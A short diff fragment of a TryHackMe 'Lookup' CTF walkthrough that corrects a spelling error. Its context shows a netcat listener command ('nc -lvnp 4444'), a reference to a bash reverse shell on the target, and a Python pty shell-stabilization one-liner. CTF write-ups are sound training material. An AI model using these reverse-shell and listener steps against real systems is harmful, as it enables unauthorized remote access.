cyvorsec/TryHackMe/Lookup CTF/TryHackMe Lookup Walkthrough.md

 nc -lvnp 4444
 ```

 When we run the bash reverse shell on target machine we get much better shell which we need to further stabilizate, so it doesn't crash on “CTRL + C” command.
-You are probably familiar with these stabilization techinique:
+You are probably familiar with this stabilization technique:

 ```shell
 python3 -c 'import pty;pty.spawn("/bin/bash")'